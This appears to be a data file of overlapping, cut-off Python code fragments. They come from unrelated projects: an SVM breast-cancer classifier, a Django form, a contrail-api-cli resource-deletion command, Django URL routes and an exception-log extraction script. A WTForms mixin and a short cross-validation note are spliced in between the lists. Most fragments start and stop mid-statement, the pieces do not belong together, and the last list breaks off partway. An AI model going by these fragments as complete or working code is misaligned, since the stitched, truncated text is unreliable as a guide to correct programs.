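    """Hypothetical mixin deduplicating the four uniqueness checks."""

    def _assert_unique(self, field_name, value, label):
        # filter_by(**{field_name: value}) mirrors the per-field queries
        # above, such as Info.query.filter_by(prn=prn.data).
        if Info.query.filter_by(**{field_name: value}).first():
            raise ValidationError(
                'This {} is already there in the database.'.format(label))

    # usage inside sisForm would then read, e.g.:
    #     def validate_prn(self, prn):
    #         self._assert_unique('prn', prn.data, 'PRN')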
[
"svm import pandas as pd df = pd.read_csv('breast-cancer-wisconsin.data.txt') df.replace('?',-99999, inplace=True) df.drop(['id'], 1, inplace=True)",
"= cross_validation.train_test_split(X, y, test_size=0.2) clf = svm.SVC() clf.fit(X_train, y_train) confidence = clf.score(X_test, y_test)",
"2, 1, 1, 1, 2, 3, 2, 1]]) example_measures = example_measures.reshape(len(example_measures), -1) prediction",
"pd df = pd.read_csv('breast-cancer-wisconsin.data.txt') df.replace('?',-99999, inplace=True) df.drop(['id'], 1, inplace=True) X = np.array(df.drop(['class'], 1))",
"np from sklearn import cross_validation, svm import pandas as pd df = pd.read_csv('breast-cancer-wisconsin.data.txt')",
"import pandas as pd df = pd.read_csv('breast-cancer-wisconsin.data.txt') df.replace('?',-99999, inplace=True) df.drop(['id'], 1, inplace=True) X",
"inplace=True) X = np.array(df.drop(['class'], 1)) y = np.array(df['class']) X_train, X_test, y_train, y_test =",
"y_train) confidence = clf.score(X_test, y_test) print(confidence) example_measures = np.array([[4, 2, 1, 1, 1,",
"df.drop(['id'], 1, inplace=True) X = np.array(df.drop(['class'], 1)) y = np.array(df['class']) X_train, X_test, y_train,",
"confidence = clf.score(X_test, y_test) print(confidence) example_measures = np.array([[4, 2, 1, 1, 1, 2,",
"np.array([[4, 2, 1, 1, 1, 2, 3, 2, 1]]) example_measures = example_measures.reshape(len(example_measures), -1)",
"import numpy as np from sklearn import cross_validation, svm import pandas as pd",
"y, test_size=0.2) clf = svm.SVC() clf.fit(X_train, y_train) confidence = clf.score(X_test, y_test) print(confidence) example_measures",
"as pd df = pd.read_csv('breast-cancer-wisconsin.data.txt') df.replace('?',-99999, inplace=True) df.drop(['id'], 1, inplace=True) X = np.array(df.drop(['class'],",
"clf = svm.SVC() clf.fit(X_train, y_train) confidence = clf.score(X_test, y_test) print(confidence) example_measures = np.array([[4,",
"svm.SVC() clf.fit(X_train, y_train) confidence = clf.score(X_test, y_test) print(confidence) example_measures = np.array([[4, 2, 1,",
"y = np.array(df['class']) X_train, X_test, y_train, y_test = cross_validation.train_test_split(X, y, test_size=0.2) clf =",
"= np.array([[4, 2, 1, 1, 1, 2, 3, 2, 1]]) example_measures = example_measures.reshape(len(example_measures),",
"pandas as pd df = pd.read_csv('breast-cancer-wisconsin.data.txt') df.replace('?',-99999, inplace=True) df.drop(['id'], 1, inplace=True) X =",
"import cross_validation, svm import pandas as pd df = pd.read_csv('breast-cancer-wisconsin.data.txt') df.replace('?',-99999, inplace=True) df.drop(['id'],",
"= clf.score(X_test, y_test) print(confidence) example_measures = np.array([[4, 2, 1, 1, 1, 2, 3,",
"y_test) print(confidence) example_measures = np.array([[4, 2, 1, 1, 1, 2, 3, 2, 1]])",
"= svm.SVC() clf.fit(X_train, y_train) confidence = clf.score(X_test, y_test) print(confidence) example_measures = np.array([[4, 2,",
"np.array(df['class']) X_train, X_test, y_train, y_test = cross_validation.train_test_split(X, y, test_size=0.2) clf = svm.SVC() clf.fit(X_train,",
"X = np.array(df.drop(['class'], 1)) y = np.array(df['class']) X_train, X_test, y_train, y_test = cross_validation.train_test_split(X,",
"y_test = cross_validation.train_test_split(X, y, test_size=0.2) clf = svm.SVC() clf.fit(X_train, y_train) confidence = clf.score(X_test,",
"cross_validation.train_test_split(X, y, test_size=0.2) clf = svm.SVC() clf.fit(X_train, y_train) confidence = clf.score(X_test, y_test) print(confidence)",
"clf.fit(X_train, y_train) confidence = clf.score(X_test, y_test) print(confidence) example_measures = np.array([[4, 2, 1, 1,",
"clf.score(X_test, y_test) print(confidence) example_measures = np.array([[4, 2, 1, 1, 1, 2, 3, 2,",
"= np.array(df.drop(['class'], 1)) y = np.array(df['class']) X_train, X_test, y_train, y_test = cross_validation.train_test_split(X, y,",
"1, 1, 1, 2, 3, 2, 1]]) example_measures = example_measures.reshape(len(example_measures), -1) prediction =",
"pd.read_csv('breast-cancer-wisconsin.data.txt') df.replace('?',-99999, inplace=True) df.drop(['id'], 1, inplace=True) X = np.array(df.drop(['class'], 1)) y = np.array(df['class'])",
"1, inplace=True) X = np.array(df.drop(['class'], 1)) y = np.array(df['class']) X_train, X_test, y_train, y_test",
"as np from sklearn import cross_validation, svm import pandas as pd df =",
"test_size=0.2) clf = svm.SVC() clf.fit(X_train, y_train) confidence = clf.score(X_test, y_test) print(confidence) example_measures =",
"from sklearn import cross_validation, svm import pandas as pd df = pd.read_csv('breast-cancer-wisconsin.data.txt') df.replace('?',-99999,",
"np.array(df.drop(['class'], 1)) y = np.array(df['class']) X_train, X_test, y_train, y_test = cross_validation.train_test_split(X, y, test_size=0.2)",
"y_train, y_test = cross_validation.train_test_split(X, y, test_size=0.2) clf = svm.SVC() clf.fit(X_train, y_train) confidence =",
"1, 2, 3, 2, 1]]) example_measures = example_measures.reshape(len(example_measures), -1) prediction = clf.predict(example_measures) print(prediction)",
"df = pd.read_csv('breast-cancer-wisconsin.data.txt') df.replace('?',-99999, inplace=True) df.drop(['id'], 1, inplace=True) X = np.array(df.drop(['class'], 1)) y",
"= np.array(df['class']) X_train, X_test, y_train, y_test = cross_validation.train_test_split(X, y, test_size=0.2) clf = svm.SVC()",
"df.replace('?',-99999, inplace=True) df.drop(['id'], 1, inplace=True) X = np.array(df.drop(['class'], 1)) y = np.array(df['class']) X_train,",
"X_train, X_test, y_train, y_test = cross_validation.train_test_split(X, y, test_size=0.2) clf = svm.SVC() clf.fit(X_train, y_train)",
"example_measures = np.array([[4, 2, 1, 1, 1, 2, 3, 2, 1]]) example_measures =",
"<filename>SVM/Cancer_prediction.py import numpy as np from sklearn import cross_validation, svm import pandas as",
"cross_validation, svm import pandas as pd df = pd.read_csv('breast-cancer-wisconsin.data.txt') df.replace('?',-99999, inplace=True) df.drop(['id'], 1,",
"= pd.read_csv('breast-cancer-wisconsin.data.txt') df.replace('?',-99999, inplace=True) df.drop(['id'], 1, inplace=True) X = np.array(df.drop(['class'], 1)) y =",
"print(confidence) example_measures = np.array([[4, 2, 1, 1, 1, 2, 3, 2, 1]]) example_measures",
"1, 1, 2, 3, 2, 1]]) example_measures = example_measures.reshape(len(example_measures), -1) prediction = clf.predict(example_measures)",
"1)) y = np.array(df['class']) X_train, X_test, y_train, y_test = cross_validation.train_test_split(X, y, test_size=0.2) clf",
"X_test, y_train, y_test = cross_validation.train_test_split(X, y, test_size=0.2) clf = svm.SVC() clf.fit(X_train, y_train) confidence",
"sklearn import cross_validation, svm import pandas as pd df = pd.read_csv('breast-cancer-wisconsin.data.txt') df.replace('?',-99999, inplace=True)",
"inplace=True) df.drop(['id'], 1, inplace=True) X = np.array(df.drop(['class'], 1)) y = np.array(df['class']) X_train, X_test,",
"numpy as np from sklearn import cross_validation, svm import pandas as pd df"
] |
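A single train/test split gives a noisy accuracy estimate. The sketch below is an addition (assuming X and y as built in the script above) that scores the same SVC with 5-fold cross-validation and feature scaling.

from sklearn import svm
from sklearn.model_selection import cross_val_score
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import StandardScaler

# X and y are assumed to be the arrays prepared in the script above.
pipe = make_pipeline(StandardScaler(), svm.SVC())
scores = cross_val_score(pipe, X, y, cv=5)
print('accuracy: %.3f +/- %.3f' % (scores.mean(), scores.std()))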
[
"from __future__ import unicode_literals from django import forms class JsonMixinForm(forms.Form): boolean = forms.BooleanField()",
"django import forms class JsonMixinForm(forms.Form): boolean = forms.BooleanField() char = forms.CharField( min_length=3, max_length=6)",
"import forms class JsonMixinForm(forms.Form): boolean = forms.BooleanField() char = forms.CharField( min_length=3, max_length=6) integer",
"boolean = forms.BooleanField() char = forms.CharField( min_length=3, max_length=6) integer = forms.IntegerField( min_value=3, max_value=6)",
"-*- from __future__ import unicode_literals from django import forms class JsonMixinForm(forms.Form): boolean =",
"forms class JsonMixinForm(forms.Form): boolean = forms.BooleanField() char = forms.CharField( min_length=3, max_length=6) integer =",
"coding:utf-8 -*- from __future__ import unicode_literals from django import forms class JsonMixinForm(forms.Form): boolean",
"__future__ import unicode_literals from django import forms class JsonMixinForm(forms.Form): boolean = forms.BooleanField() char",
"JsonMixinForm(forms.Form): boolean = forms.BooleanField() char = forms.CharField( min_length=3, max_length=6) integer = forms.IntegerField( min_value=3,",
"# -*- coding:utf-8 -*- from __future__ import unicode_literals from django import forms class",
"from django import forms class JsonMixinForm(forms.Form): boolean = forms.BooleanField() char = forms.CharField( min_length=3,",
"unicode_literals from django import forms class JsonMixinForm(forms.Form): boolean = forms.BooleanField() char = forms.CharField(",
"-*- coding:utf-8 -*- from __future__ import unicode_literals from django import forms class JsonMixinForm(forms.Form):",
"class JsonMixinForm(forms.Form): boolean = forms.BooleanField() char = forms.CharField( min_length=3, max_length=6) integer = forms.IntegerField(",
"import unicode_literals from django import forms class JsonMixinForm(forms.Form): boolean = forms.BooleanField() char ="
] |
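A minimal usage sketch for the form above; the standalone settings.configure() call, the module name "forms", and the sample payload are illustrative assumptions.

import django
from django.conf import settings

settings.configure(USE_I18N=False)  # minimal standalone setup
django.setup()

from forms import JsonMixinForm  # assumes the module above is forms.py

form = JsonMixinForm(data={'boolean': 'on', 'char': 'abcd', 'integer': '5'})
print(form.is_valid())    # True: all three values satisfy the bounds
print(form.cleaned_data)  # {'boolean': True, 'char': 'abcd', 'integer': 5}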
[
"help=\"Recursive delete of back_refs and children resources\") force = Option(\"-f\", action=\"store_true\", default=False, help=\"Don't",
"if resources: message = \"\"\"About to delete: - %s\"\"\" % \"\\n - \".join([self.current_path(r)",
"force = Option(\"-f\", action=\"store_true\", default=False, help=\"Don't ask for confirmation\") def _get_back_refs(self, resources, back_refs):",
"ask for confirmation\") def _get_back_refs(self, resources, back_refs): for resource in resources: resource.fetch() if",
"back_ref in itertools.chain(resource.back_refs, resource.children): back_refs = self._get_back_refs([back_ref], back_refs) return back_refs def __call__(self, paths=None,",
"paths = Arg(nargs=\"*\", help=\"Resource path(s)\", metavar='path', complete=\"resources::path\") recursive = Option(\"-r\", action=\"store_true\", default=False, help=\"Recursive",
"- %s\"\"\" % \"\\n - \".join([self.current_path(r) for r in resources]) if force or",
"back_refs) return back_refs def __call__(self, paths=None, recursive=False, force=False): resources = expand_paths(paths, predicate=lambda r:",
"in resources]) if force or continue_prompt(message=message): for r in reversed(resources): print((\"Deleting %s\" %",
"children resources\") force = Option(\"-f\", action=\"store_true\", default=False, help=\"Don't ask for confirmation\") def _get_back_refs(self,",
"resource from the API. .. warning:: `-r` option can be used to delete",
"delete of back_refs and children resources\") force = Option(\"-f\", action=\"store_true\", default=False, help=\"Don't ask",
"= self._get_back_refs([back_ref], back_refs) return back_refs def __call__(self, paths=None, recursive=False, force=False): resources = expand_paths(paths,",
"if recursive: resources = self._get_back_refs(resources, []) if resources: message = \"\"\"About to delete:",
"return back_refs def __call__(self, paths=None, recursive=False, force=False): resources = expand_paths(paths, predicate=lambda r: isinstance(r,",
"to delete recursively back_refs of the resource. \"\"\" description = \"Delete a resource\"",
"-*- coding: utf-8 -*- import itertools from ..command import Command, Arg, Option, experimental,",
"Option, experimental, expand_paths from ..resource import Resource from ..utils import continue_prompt @experimental class",
"`-r` option can be used to delete recursively back_refs of the resource. \"\"\"",
"action=\"store_true\", default=False, help=\"Recursive delete of back_refs and children resources\") force = Option(\"-f\", action=\"store_true\",",
"utf-8 -*- import itertools from ..command import Command, Arg, Option, experimental, expand_paths from",
"class Rm(Command): \"\"\"Delete a resource from the API. .. warning:: `-r` option can",
"back_refs): for resource in resources: resource.fetch() if resource in back_refs: back_refs.remove(resource) back_refs.append(resource) for",
"= \"Delete a resource\" paths = Arg(nargs=\"*\", help=\"Resource path(s)\", metavar='path', complete=\"resources::path\") recursive =",
"coding: utf-8 -*- import itertools from ..command import Command, Arg, Option, experimental, expand_paths",
"default=False, help=\"Recursive delete of back_refs and children resources\") force = Option(\"-f\", action=\"store_true\", default=False,",
"for confirmation\") def _get_back_refs(self, resources, back_refs): for resource in resources: resource.fetch() if resource",
"resource in back_refs: back_refs.remove(resource) back_refs.append(resource) for back_ref in itertools.chain(resource.back_refs, resource.children): back_refs = self._get_back_refs([back_ref],",
"and children resources\") force = Option(\"-f\", action=\"store_true\", default=False, help=\"Don't ask for confirmation\") def",
"resources = expand_paths(paths, predicate=lambda r: isinstance(r, Resource)) if recursive: resources = self._get_back_refs(resources, [])",
"predicate=lambda r: isinstance(r, Resource)) if recursive: resources = self._get_back_refs(resources, []) if resources: message",
"..resource import Resource from ..utils import continue_prompt @experimental class Rm(Command): \"\"\"Delete a resource",
"from the API. .. warning:: `-r` option can be used to delete recursively",
"Option(\"-f\", action=\"store_true\", default=False, help=\"Don't ask for confirmation\") def _get_back_refs(self, resources, back_refs): for resource",
"complete=\"resources::path\") recursive = Option(\"-r\", action=\"store_true\", default=False, help=\"Recursive delete of back_refs and children resources\")",
"to delete: - %s\"\"\" % \"\\n - \".join([self.current_path(r) for r in resources]) if",
"for resource in resources: resource.fetch() if resource in back_refs: back_refs.remove(resource) back_refs.append(resource) for back_ref",
"self._get_back_refs([back_ref], back_refs) return back_refs def __call__(self, paths=None, recursive=False, force=False): resources = expand_paths(paths, predicate=lambda",
"path(s)\", metavar='path', complete=\"resources::path\") recursive = Option(\"-r\", action=\"store_true\", default=False, help=\"Recursive delete of back_refs and",
"back_refs of the resource. \"\"\" description = \"Delete a resource\" paths = Arg(nargs=\"*\",",
"= Option(\"-f\", action=\"store_true\", default=False, help=\"Don't ask for confirmation\") def _get_back_refs(self, resources, back_refs): for",
"_get_back_refs(self, resources, back_refs): for resource in resources: resource.fetch() if resource in back_refs: back_refs.remove(resource)",
"resources: message = \"\"\"About to delete: - %s\"\"\" % \"\\n - \".join([self.current_path(r) for",
"def _get_back_refs(self, resources, back_refs): for resource in resources: resource.fetch() if resource in back_refs:",
"from ..utils import continue_prompt @experimental class Rm(Command): \"\"\"Delete a resource from the API.",
"Rm(Command): \"\"\"Delete a resource from the API. .. warning:: `-r` option can be",
"of the resource. \"\"\" description = \"Delete a resource\" paths = Arg(nargs=\"*\", help=\"Resource",
"= self._get_back_refs(resources, []) if resources: message = \"\"\"About to delete: - %s\"\"\" %",
"%s\"\"\" % \"\\n - \".join([self.current_path(r) for r in resources]) if force or continue_prompt(message=message):",
"back_refs: back_refs.remove(resource) back_refs.append(resource) for back_ref in itertools.chain(resource.back_refs, resource.children): back_refs = self._get_back_refs([back_ref], back_refs) return",
"continue_prompt @experimental class Rm(Command): \"\"\"Delete a resource from the API. .. warning:: `-r`",
"resources = self._get_back_refs(resources, []) if resources: message = \"\"\"About to delete: - %s\"\"\"",
"can be used to delete recursively back_refs of the resource. \"\"\" description =",
"back_refs def __call__(self, paths=None, recursive=False, force=False): resources = expand_paths(paths, predicate=lambda r: isinstance(r, Resource))",
"r: isinstance(r, Resource)) if recursive: resources = self._get_back_refs(resources, []) if resources: message =",
"default=False, help=\"Don't ask for confirmation\") def _get_back_refs(self, resources, back_refs): for resource in resources:",
"__call__(self, paths=None, recursive=False, force=False): resources = expand_paths(paths, predicate=lambda r: isinstance(r, Resource)) if recursive:",
"option can be used to delete recursively back_refs of the resource. \"\"\" description",
"help=\"Don't ask for confirmation\") def _get_back_refs(self, resources, back_refs): for resource in resources: resource.fetch()",
"recursive = Option(\"-r\", action=\"store_true\", default=False, help=\"Recursive delete of back_refs and children resources\") force",
"import itertools from ..command import Command, Arg, Option, experimental, expand_paths from ..resource import",
"resource in resources: resource.fetch() if resource in back_refs: back_refs.remove(resource) back_refs.append(resource) for back_ref in",
"\"Delete a resource\" paths = Arg(nargs=\"*\", help=\"Resource path(s)\", metavar='path', complete=\"resources::path\") recursive = Option(\"-r\",",
"import Resource from ..utils import continue_prompt @experimental class Rm(Command): \"\"\"Delete a resource from",
"delete: - %s\"\"\" % \"\\n - \".join([self.current_path(r) for r in resources]) if force",
"= Option(\"-r\", action=\"store_true\", default=False, help=\"Recursive delete of back_refs and children resources\") force =",
"expand_paths(paths, predicate=lambda r: isinstance(r, Resource)) if recursive: resources = self._get_back_refs(resources, []) if resources:",
"resource. \"\"\" description = \"Delete a resource\" paths = Arg(nargs=\"*\", help=\"Resource path(s)\", metavar='path',",
"= expand_paths(paths, predicate=lambda r: isinstance(r, Resource)) if recursive: resources = self._get_back_refs(resources, []) if",
"force=False): resources = expand_paths(paths, predicate=lambda r: isinstance(r, Resource)) if recursive: resources = self._get_back_refs(resources,",
"API. .. warning:: `-r` option can be used to delete recursively back_refs of",
"confirmation\") def _get_back_refs(self, resources, back_refs): for resource in resources: resource.fetch() if resource in",
"-*- import itertools from ..command import Command, Arg, Option, experimental, expand_paths from ..resource",
"..utils import continue_prompt @experimental class Rm(Command): \"\"\"Delete a resource from the API. ..",
"Arg(nargs=\"*\", help=\"Resource path(s)\", metavar='path', complete=\"resources::path\") recursive = Option(\"-r\", action=\"store_true\", default=False, help=\"Recursive delete of",
"# -*- coding: utf-8 -*- import itertools from ..command import Command, Arg, Option,",
"\"\\n - \".join([self.current_path(r) for r in resources]) if force or continue_prompt(message=message): for r",
"Option(\"-r\", action=\"store_true\", default=False, help=\"Recursive delete of back_refs and children resources\") force = Option(\"-f\",",
"Arg, Option, experimental, expand_paths from ..resource import Resource from ..utils import continue_prompt @experimental",
"if resource in back_refs: back_refs.remove(resource) back_refs.append(resource) for back_ref in itertools.chain(resource.back_refs, resource.children): back_refs =",
"\"\"\"About to delete: - %s\"\"\" % \"\\n - \".join([self.current_path(r) for r in resources])",
"from ..resource import Resource from ..utils import continue_prompt @experimental class Rm(Command): \"\"\"Delete a",
"description = \"Delete a resource\" paths = Arg(nargs=\"*\", help=\"Resource path(s)\", metavar='path', complete=\"resources::path\") recursive",
"resources\") force = Option(\"-f\", action=\"store_true\", default=False, help=\"Don't ask for confirmation\") def _get_back_refs(self, resources,",
"in itertools.chain(resource.back_refs, resource.children): back_refs = self._get_back_refs([back_ref], back_refs) return back_refs def __call__(self, paths=None, recursive=False,",
"isinstance(r, Resource)) if recursive: resources = self._get_back_refs(resources, []) if resources: message = \"\"\"About",
"itertools.chain(resource.back_refs, resource.children): back_refs = self._get_back_refs([back_ref], back_refs) return back_refs def __call__(self, paths=None, recursive=False, force=False):",
"<reponame>mrasskazov/contrail-api-cli<gh_stars>0 # -*- coding: utf-8 -*- import itertools from ..command import Command, Arg,",
"itertools from ..command import Command, Arg, Option, experimental, expand_paths from ..resource import Resource",
"back_refs.remove(resource) back_refs.append(resource) for back_ref in itertools.chain(resource.back_refs, resource.children): back_refs = self._get_back_refs([back_ref], back_refs) return back_refs",
"back_refs.append(resource) for back_ref in itertools.chain(resource.back_refs, resource.children): back_refs = self._get_back_refs([back_ref], back_refs) return back_refs def",
"resources]) if force or continue_prompt(message=message): for r in reversed(resources): print((\"Deleting %s\" % self.current_path(r)))",
"of back_refs and children resources\") force = Option(\"-f\", action=\"store_true\", default=False, help=\"Don't ask for",
"\"\"\"Delete a resource from the API. .. warning:: `-r` option can be used",
"for r in resources]) if force or continue_prompt(message=message): for r in reversed(resources): print((\"Deleting",
"[]) if resources: message = \"\"\"About to delete: - %s\"\"\" % \"\\n -",
"be used to delete recursively back_refs of the resource. \"\"\" description = \"Delete",
"if force or continue_prompt(message=message): for r in reversed(resources): print((\"Deleting %s\" % self.current_path(r))) r.delete()",
"warning:: `-r` option can be used to delete recursively back_refs of the resource.",
"Command, Arg, Option, experimental, expand_paths from ..resource import Resource from ..utils import continue_prompt",
"= Arg(nargs=\"*\", help=\"Resource path(s)\", metavar='path', complete=\"resources::path\") recursive = Option(\"-r\", action=\"store_true\", default=False, help=\"Recursive delete",
"resource.children): back_refs = self._get_back_refs([back_ref], back_refs) return back_refs def __call__(self, paths=None, recursive=False, force=False): resources",
"back_refs = self._get_back_refs([back_ref], back_refs) return back_refs def __call__(self, paths=None, recursive=False, force=False): resources =",
"from ..command import Command, Arg, Option, experimental, expand_paths from ..resource import Resource from",
"experimental, expand_paths from ..resource import Resource from ..utils import continue_prompt @experimental class Rm(Command):",
"resources, back_refs): for resource in resources: resource.fetch() if resource in back_refs: back_refs.remove(resource) back_refs.append(resource)",
"@experimental class Rm(Command): \"\"\"Delete a resource from the API. .. warning:: `-r` option",
"help=\"Resource path(s)\", metavar='path', complete=\"resources::path\") recursive = Option(\"-r\", action=\"store_true\", default=False, help=\"Recursive delete of back_refs",
"used to delete recursively back_refs of the resource. \"\"\" description = \"Delete a",
"in resources: resource.fetch() if resource in back_refs: back_refs.remove(resource) back_refs.append(resource) for back_ref in itertools.chain(resource.back_refs,",
"resources: resource.fetch() if resource in back_refs: back_refs.remove(resource) back_refs.append(resource) for back_ref in itertools.chain(resource.back_refs, resource.children):",
"import continue_prompt @experimental class Rm(Command): \"\"\"Delete a resource from the API. .. warning::",
"back_refs and children resources\") force = Option(\"-f\", action=\"store_true\", default=False, help=\"Don't ask for confirmation\")",
"delete recursively back_refs of the resource. \"\"\" description = \"Delete a resource\" paths",
"recursively back_refs of the resource. \"\"\" description = \"Delete a resource\" paths =",
"\"\"\" description = \"Delete a resource\" paths = Arg(nargs=\"*\", help=\"Resource path(s)\", metavar='path', complete=\"resources::path\")",
"in back_refs: back_refs.remove(resource) back_refs.append(resource) for back_ref in itertools.chain(resource.back_refs, resource.children): back_refs = self._get_back_refs([back_ref], back_refs)",
"for back_ref in itertools.chain(resource.back_refs, resource.children): back_refs = self._get_back_refs([back_ref], back_refs) return back_refs def __call__(self,",
"\".join([self.current_path(r) for r in resources]) if force or continue_prompt(message=message): for r in reversed(resources):",
"a resource\" paths = Arg(nargs=\"*\", help=\"Resource path(s)\", metavar='path', complete=\"resources::path\") recursive = Option(\"-r\", action=\"store_true\",",
"Resource)) if recursive: resources = self._get_back_refs(resources, []) if resources: message = \"\"\"About to",
"metavar='path', complete=\"resources::path\") recursive = Option(\"-r\", action=\"store_true\", default=False, help=\"Recursive delete of back_refs and children",
"..command import Command, Arg, Option, experimental, expand_paths from ..resource import Resource from ..utils",
".. warning:: `-r` option can be used to delete recursively back_refs of the",
"action=\"store_true\", default=False, help=\"Don't ask for confirmation\") def _get_back_refs(self, resources, back_refs): for resource in",
"% \"\\n - \".join([self.current_path(r) for r in resources]) if force or continue_prompt(message=message): for",
"Resource from ..utils import continue_prompt @experimental class Rm(Command): \"\"\"Delete a resource from the",
"a resource from the API. .. warning:: `-r` option can be used to",
"the resource. \"\"\" description = \"Delete a resource\" paths = Arg(nargs=\"*\", help=\"Resource path(s)\",",
"message = \"\"\"About to delete: - %s\"\"\" % \"\\n - \".join([self.current_path(r) for r",
"resource.fetch() if resource in back_refs: back_refs.remove(resource) back_refs.append(resource) for back_ref in itertools.chain(resource.back_refs, resource.children): back_refs",
"self._get_back_refs(resources, []) if resources: message = \"\"\"About to delete: - %s\"\"\" % \"\\n",
"recursive=False, force=False): resources = expand_paths(paths, predicate=lambda r: isinstance(r, Resource)) if recursive: resources =",
"import Command, Arg, Option, experimental, expand_paths from ..resource import Resource from ..utils import",
"the API. .. warning:: `-r` option can be used to delete recursively back_refs",
"resource\" paths = Arg(nargs=\"*\", help=\"Resource path(s)\", metavar='path', complete=\"resources::path\") recursive = Option(\"-r\", action=\"store_true\", default=False,",
"r in resources]) if force or continue_prompt(message=message): for r in reversed(resources): print((\"Deleting %s\"",
"recursive: resources = self._get_back_refs(resources, []) if resources: message = \"\"\"About to delete: -",
"paths=None, recursive=False, force=False): resources = expand_paths(paths, predicate=lambda r: isinstance(r, Resource)) if recursive: resources",
"= \"\"\"About to delete: - %s\"\"\" % \"\\n - \".join([self.current_path(r) for r in",
"- \".join([self.current_path(r) for r in resources]) if force or continue_prompt(message=message): for r in",
"def __call__(self, paths=None, recursive=False, force=False): resources = expand_paths(paths, predicate=lambda r: isinstance(r, Resource)) if",
"expand_paths from ..resource import Resource from ..utils import continue_prompt @experimental class Rm(Command): \"\"\"Delete"
] |
[
"urlpatterns = patterns('', # Examples: url(r'^service/.*/(?P<service_id>[0-9]+)/edit/?$', 'r_pass.views.edit'), url(r'^service/.*/(?P<service_id>[0-9]+)/?$', 'r_pass.views.service'), url(r'^create/?$', 'r_pass.views.create'), url(r'', 'r_pass.views.home'),",
"include, url urlpatterns = patterns('', # Examples: url(r'^service/.*/(?P<service_id>[0-9]+)/edit/?$', 'r_pass.views.edit'), url(r'^service/.*/(?P<service_id>[0-9]+)/?$', 'r_pass.views.service'), url(r'^create/?$', 'r_pass.views.create'),",
"= patterns('', # Examples: url(r'^service/.*/(?P<service_id>[0-9]+)/edit/?$', 'r_pass.views.edit'), url(r'^service/.*/(?P<service_id>[0-9]+)/?$', 'r_pass.views.service'), url(r'^create/?$', 'r_pass.views.create'), url(r'', 'r_pass.views.home'), )",
"from django.conf.urls import patterns, include, url urlpatterns = patterns('', # Examples: url(r'^service/.*/(?P<service_id>[0-9]+)/edit/?$', 'r_pass.views.edit'),",
"patterns, include, url urlpatterns = patterns('', # Examples: url(r'^service/.*/(?P<service_id>[0-9]+)/edit/?$', 'r_pass.views.edit'), url(r'^service/.*/(?P<service_id>[0-9]+)/?$', 'r_pass.views.service'), url(r'^create/?$',",
"import patterns, include, url urlpatterns = patterns('', # Examples: url(r'^service/.*/(?P<service_id>[0-9]+)/edit/?$', 'r_pass.views.edit'), url(r'^service/.*/(?P<service_id>[0-9]+)/?$', 'r_pass.views.service'),",
"url urlpatterns = patterns('', # Examples: url(r'^service/.*/(?P<service_id>[0-9]+)/edit/?$', 'r_pass.views.edit'), url(r'^service/.*/(?P<service_id>[0-9]+)/?$', 'r_pass.views.service'), url(r'^create/?$', 'r_pass.views.create'), url(r'',",
"django.conf.urls import patterns, include, url urlpatterns = patterns('', # Examples: url(r'^service/.*/(?P<service_id>[0-9]+)/edit/?$', 'r_pass.views.edit'), url(r'^service/.*/(?P<service_id>[0-9]+)/?$',"
] |
[
"glob.glob(\"ignored_data/exceptions/*.txt\") for path in files: with open(f\"ignored_data/exceptions.txt\", \"a\", encoding=\"utf-8\", errors=\"ignore\") as output: with",
"with open(path, \"r+\", encoding=\"utf-8\", errors='ignore') as file: lines = \"\\n\".join(file.readlines()) output.write(lines) def load_exceptions(filename):",
"threads = [] for chunk in chunked_files: t = threading.Thread(target=extract_exceptions, args=(chunk,)) threads.append(t) t.start()",
"= retrieve_exception_dictionary(filename) ex_dict_keys = list(ex_dict.keys()) ex_dict_keys.sort() for key in ex_dict_keys: values = ex_dict[key]",
"= f\"ignored_data/exceptions/{fileName}.txt\" if os.path.isfile(outputFile): continue with open(path, \"r+\", encoding=\"utf-8\", errors='ignore') as file: lines",
"as file: lines = \"\\n\".join(file.readlines()) excs = retrieve_exceptions(lines) if len(excs) == 0: continue",
"= chunks(files, threads) threads = [] for chunk in chunked_files: t = threading.Thread(target=extract_exceptions,",
"with open(f\"ignored_data/{filename}\", \"r+\", encoding=\"utf-8\", errors='ignore') as file: lines = \"\\n\".join(file.readlines()) return retrieve_exceptions(lines) def",
"as output: for exception in excs: output.write(exception.__str__() + \"\\n\") def orchestrate_extraction(threads=8): files =",
"== 0: continue print(path) with open(f\"ignored_data/exceptions/{fileName}.txt\", \"a\", encoding=\"utf-8\", errors=\"ignore\") as output: for exception",
"{} for exception in exceptions: if exception.exception not in ex_dict: ex_dict[exception.exception] = []",
"= glob.glob(\"ignored_data/downloads/*.xml\") files.sort() chunked_files = chunks(files, threads) threads = [] for chunk in",
"glob.glob(\"ignored_data/downloads/*.xml\") files.sort() chunked_files = chunks(files, threads) threads = [] for chunk in chunked_files:",
"ex_dict[key] if len(values) < 2: continue print(key) for value in values: print(f\"\\t{value}\") #",
"errors=\"ignore\") as output: for exception in excs: output.write(exception.__str__() + \"\\n\") def orchestrate_extraction(threads=8): files",
"= ex_dict[key] if len(values) < 2: continue print(key) for value in values: print(f\"\\t{value}\")",
"ex_dict = {} for exception in exceptions: if exception.exception not in ex_dict: ex_dict[exception.exception]",
"for exception in excs: output.write(exception.__str__() + \"\\n\") def orchestrate_extraction(threads=8): files = glob.glob(\"ignored_data/downloads/*.xml\") files.sort()",
"= [] for chunk in chunked_files: t = threading.Thread(target=extract_exceptions, args=(chunk,)) threads.append(t) t.start() for",
"retrieve_exception_dictionary(filename): exceptions = load_exceptions(filename) ex_dict = {} for exception in exceptions: if exception.exception",
"as file: lines = \"\\n\".join(file.readlines()) return retrieve_exceptions(lines) def retrieve_exception_dictionary(filename): exceptions = load_exceptions(filename) ex_dict",
"chunked_files = chunks(files, threads) threads = [] for chunk in chunked_files: t =",
"import chunks import threading import glob from pathlib import Path import os def",
"list(ex_dict.keys()) ex_dict_keys.sort() for key in ex_dict_keys: values = ex_dict[key] if len(values) < 2:",
"\"a\", encoding=\"utf-8\", errors=\"ignore\") as output: with open(path, \"r+\", encoding=\"utf-8\", errors='ignore') as file: lines",
"load_exceptions(filename): with open(f\"ignored_data/{filename}\", \"r+\", encoding=\"utf-8\", errors='ignore') as file: lines = \"\\n\".join(file.readlines()) return retrieve_exceptions(lines)",
"for t in threads: t.join() files = glob.glob(\"ignored_data/exceptions/*.txt\") for path in files: with",
"file: lines = \"\\n\".join(file.readlines()) return retrieve_exceptions(lines) def retrieve_exception_dictionary(filename): exceptions = load_exceptions(filename) ex_dict =",
"encoding=\"utf-8\", errors=\"ignore\") as output: with open(path, \"r+\", encoding=\"utf-8\", errors='ignore') as file: lines =",
